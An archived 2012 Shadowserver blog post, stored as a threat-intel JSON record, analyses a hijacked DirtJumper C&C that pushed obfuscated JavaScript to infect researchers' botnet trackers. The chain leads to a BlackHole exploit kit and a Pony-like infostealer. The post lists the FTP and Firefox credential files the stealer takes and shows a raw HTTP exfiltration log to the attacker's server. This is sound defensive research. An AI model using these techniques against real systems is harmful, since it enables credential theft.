{
	"id": "9364ecea-a18f-4be4-8043-fbb471b3912b",
	"created_at": "2026-04-06T00:13:59.075428Z",
	"updated_at": "2026-04-10T03:21:24.430358Z",
	"deleted_at": null,
	"sha1_hash": "e43c021006743a2b311e296bf4eb762c0b5c1b6b",
	"title": "Beware the trolls, secure your trackers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 197872,
	"plain_text": "Beware the trolls, secure your trackers\r\nArchived: 2026-04-05 18:24:42 UTC\r\nby Claudio Guarnieri\r\n(Note: the post was originally written on Aug 8th 2012)\r\nYou track botnets? Right, we do as well.\r\nYou spent your weekends building your slick botnet trackers and some fancy web interface? Damn, we did too.\r\nBut let’s face the truth, DDoS is f**king boring. What gives better sense to your day than some random crook trolling you\r\nand your monitoring infrastructure? Nothing.\r\nSo here’s what happened today…\r\nSince I’m not really following the DDoS scene a lot lately, I kinda left over for some time the trackers that I built and that\r\nwe are using internally in Shadowserver. Today I decided to open it up again just to show it some love and check if there\r\nwas anything interesting being targeted, while sipping my coffee.\r\nI was expecting the usual amount of porn websites, random Russian forums, Lineage II shards and the traditional average\r\ntarget for the traditional average botnet, but that wasn’t the case today… something stood up.\r\nOne of the DirtJumper botnets we are tracking, located on the domain “bnbgcw.com” started spreading some weird\r\ncommands:\r\nThe beginning of the command is a traditional DirtJumper response, some basic parameters (like threads, duration of attack,\r\ndelay of C\u0026C polling and such) separated by a dash and followed by the actual target of the DDoS attack, and here comes\r\nthe funny thing. Appended to the original target (which was already being attacked previously and that isn’t really relevant\r\nfor us at this stage) is a whole bunch of obfuscated JavaScript code.\r\nI removed the whole obfuscated code, but you can see it decoded as follows:\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 1 of 5\n\nSo what this thing does in short is:\r\n1. dynamically generate a domain out of a given seed and the current date\r\n2. use the domain to build a landing URL\r\n3. embed the URL in an \u003ciframe\u003e which is then printed in the page body\r\nIn the end, it will load a page located at:\r\nhxxp://kegkvfoagyqoouky[.]ru/in.cgi?15\r\nSo, assuming that this guy is not dumb enough to possibly try to magically remote exploit or inject the target page through\r\nthe use of his botnet, my idea is that what he is actually trying achieve is exploit security researchers like us that are\r\ntracking his own botnet.\r\nIt’s actually quite a sharp idea: your tracker pulls the command from his C\u0026C, store it in some sort of database and print it\r\nin your fancy web interface, you didn’t bother to sanitize the data, the \u003ciframe\u003e gets embedded in your own page and\r\nBANG, your pwned.\r\nIf you run the URL through Thug (thanks Angelo!), you’ll see that the page (when meeting certain requirements) actually\r\nredirects to:\r\nhxxp://wertbuy.toythieves[.]com/main.php?page=9dd146e88937797b\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 2 of 5\n\nA BlackHole setup which, after a failed attempt of loading a Java applet Torb.jar (1/41), successfully used the\r\ninfamous Microsoft MDAC RDS.Dataspace ActiveX vulnerability to exploit the browser and drop the payload. Nothing\r\nnew, traditional BlackHole behavior, but you can find the complete Thug report here.\r\nUpon successful exploitation, it drops a  payload with the following characteristics:\r\nFile size: 348672 bytes\r\nFile type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nCRC32: C9ABC946\r\nMD5: 4ce73d6a52bfa3f56c67942f8ebf2c69\r\nSHA1: 6ce4f9bbf786f69a51d7f54e2cc190e438eb1c24\r\nSHA256: ac81dc130e331d6e0f09e58b520981776aebfaf8e3dab68e96d4e2252b0a6f7c\r\nSHA512:\r\nb2d7edba3470c179873555e2937cd28c471a6b4da83632157d27cc7d2d58caffe97f7a2fc63199ed83d3d251fd0dbae849b86a1860234aecac0594\r\nSsdeep: 1536:Qy23ZX+7rtoub3aBsUV+xhhD2a4ToJsQ0fd3AonLa:Qy2Ngr3Ev+tya99\r\nWe are not sure yet about the nature of the malware as it an extremely low detection rate (1/40), but it looks consistent to\r\nPony, a loader and infostealer widely used in ZeuS campaigns.\r\nThe first reason we believe it is because, just like Pony, this sample is not persistent: it executes from the memory, deletes\r\nitself and just disappear.\r\nThe second reason is because of the data it tries to collect and steal:\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Pro\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Pro\\\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Lite\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\GlobalSCAPE\\CuteFTP Lite\\\r\nC:\\Documents and Settings\\User\\Application Data\\CuteFTP\\sm.dat\r\nC:\\Documents and Settings\\User\\Application Data\\CuteFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\3\\Sites.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\Sites.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\3\\Quick.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\Quick.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\3\\History.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FlashFXP\\4\\History.dat\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\sitemanager.xml\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\recentservers.xml\r\nC:\\Documents and Settings\\User\\Application Data\\FileZilla\\filezilla.xml\r\nC:\\Documents and Settings\\User\\Application Data\\SmartFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\TurboFTP\\\r\nC:\\Documents and Settings\\User\\Application Data\\FTP Explorer\\\r\nC:\\Documents and Settings\\User\\Application Data\\Frigate3\\\r\nC:\\Documents and Settings\\User\\Application Data\\VanDyke\\Config\\Sessions\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\profiles.ini\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\bookmarkbackups\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\minidumps\\\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\signons.sqlite\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\secmod.db\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\cert8.db\r\nC:\\Documents and Settings\\User\\Application Data\\Mozilla\\Firefox\\Profiles\\abcdefgh.default\\key3.db\r\nAnd much much more…\r\nIt then establishes a network communication to “coppercreek.ru”:\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 3 of 5\n\nPOST /boi854tr4w.php HTTP/1.0\r\nHost: coppercreek.ru\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: 269\r\nConnection: close\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n0000010C 43 52 59 50 54 45 44 30 a8 71 d1 89 53 50 b1 e1 CRYPTED0 .q..SP..\r\n0000011C 90 ca 28 0b 58 99 fe 0a ea a0 17 b2 0d 49 95 a6 ..(.X... .....I..\r\n0000012C 7d 62 57 c1 f6 6b 22 8a 27 77 fd ab 9d 4e b1 2a }bW..k\". 'w...N.*\r\n0000013C 10 2e 2a 76 9e 62 53 e4 b6 32 c2 14 f8 e5 27 77 ..*v.bS. .2....'w\r\n0000014C 8c aa 85 57 15 4e 06 81 d2 1d c6 79 49 0d 8a ad ...W.N.. ...yI...\r\n0000015C c1 1a b3 b3 3c 35 3d ee 38 ea 3d 5c f0 5a 69 93 ....\u003c5=. 8.=\\.Zi.\r\n0000016C bd be d3 43 1b 58 97 1f 97 33 44 e2 cb 1d 52 f5 ...C.X.. .3D...R.\r\n0000017C cb 19 df 47 ba df e8 9e 71 89 92 46 b4 13 14 bd ...G.... q..F....\r\n0000018C 35 b4 84 0b 0d 10 cb d4 37 da 26 f4 0e bd 21 c5 5....... 7.\u0026...!.\r\n0000019C 0b 0b 4d ce 3f fa 95 3e 04 7e fd 50 01 0f 20 da ..M.?..\u003e .~.P.. .\r\n000001AC 68 21 33 41 54 93 44 2e 58 ba 8f 66 f3 c9 d3 6e h!3AT.D. X..f...n\r\n000001BC 7f ee 8d 7b 0b 70 9f 92 ce f8 8d dd 59 db 11 aa ...{.p.. ....Y...\r\n000001CC 29 42 1b ec 9a 20 28 2e 9e 37 f4 40 5e 95 40 79 )B... (. .7.@^.@y\r\n000001DC c1 8b 9e ca 4a dd 05 6a 0f 53 c6 ce 64 c0 ab e3 ....J..j .S..d...\r\n000001EC 75 70 f0 b2 3b ef 1e 8c 53 4e 35 47 5b 17 0f 0a up..;... SN5G[...\r\n000001FC 2a 1c 8c 44 a7 4d cc 9a 7a 09 c2 6d 2a 3f 30 ff *..D.M.. z..m*?0.\r\n0000020C 4a a4 27 92 7c a5 0b 85 e3 e9 eb 9d cf J.'.|... .....\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 08 Aug 2012 16:33:11 GMT\r\nContent-Type: text/html; charset=windows-1251\r\nContent-Length: 16\r\nConnection: close\r\nX-Powered-By: PHP/5.3.15\r\nVary: Accept-Encoding,User-Agent\r\nSTATUS-IMPORT-OK\r\nWe are not sure about the nature of the encryption, it will need more time to analyze it. If you already encountered this and\r\nyou are able to recognize the family, please let us know.\r\nNo additional payload was dropped.\r\nIt’s very interesting to note that this payload was uploaded both on VirusTotal and on Malwr.com today from a Verizon\r\nWireless connection in USA. As you can see the analysis on Malwr failed (side note: Malwr is currently running a very\r\noutdated version of Cuckoo Sandbox, whose version 0.4 is perfectly able to analyze this sample).\r\nThis attack has been going on for a couple of days already, but the latest version has been updated today.\r\nA very similar version of this sample, with same behavior and file name, has been uploaded by the same guy a few days\r\nearlier on Malwr.com and on VirusTotal again.\r\nIn that case the results of Malwr’s analysis as well as Antiviruses detection were much better, therefore, unless some of you\r\nguys come up these days to tell me it was him, this makes me believe that the mastermind behind these attacks has been\r\nactively trying to enhance his evasion and anti-detection techniques until he reached satisfying results.\r\nThis could be a whole big speculation, the guy might just be totally dumb and there was no intention to actually target botnet\r\nresearchers.\r\nBut if this was actually a correct interpretation, it’s a very interesting learning experience and a warning to all the\r\nresearchers out there feeling safe: our security panopticon could actually turn inside out and making us the ones being\r\nwatched.\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 4 of 5\n\nUpdate #1: the detection rate of the sample increased to 16/41 at this time.\r\nUpdate #2: Our friend Armin from WebSense informed us that this attack matches with an ongoing campaign that they have\r\nbeen tracking. Seems like this DirtJumper C\u0026C got compromised and it’s distributing the JavaScript code we presented. It’s\r\nkinda hilarious, crooks getting pwnd by other crooks, but the result is still the same: some harmful code included in the\r\ncontext of trusted applications as our botnet trackers are.\r\nSource: https://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nhttps://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/"
	],
	"report_names": [
		"beware-the-trolls-secure-your-trackers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434439,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.pdf",
		"text": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.txt",
		"img": "https://archive.orkl.eu/e43c021006743a2b311e296bf4eb762c0b5c1b6b.jpg"
	}
}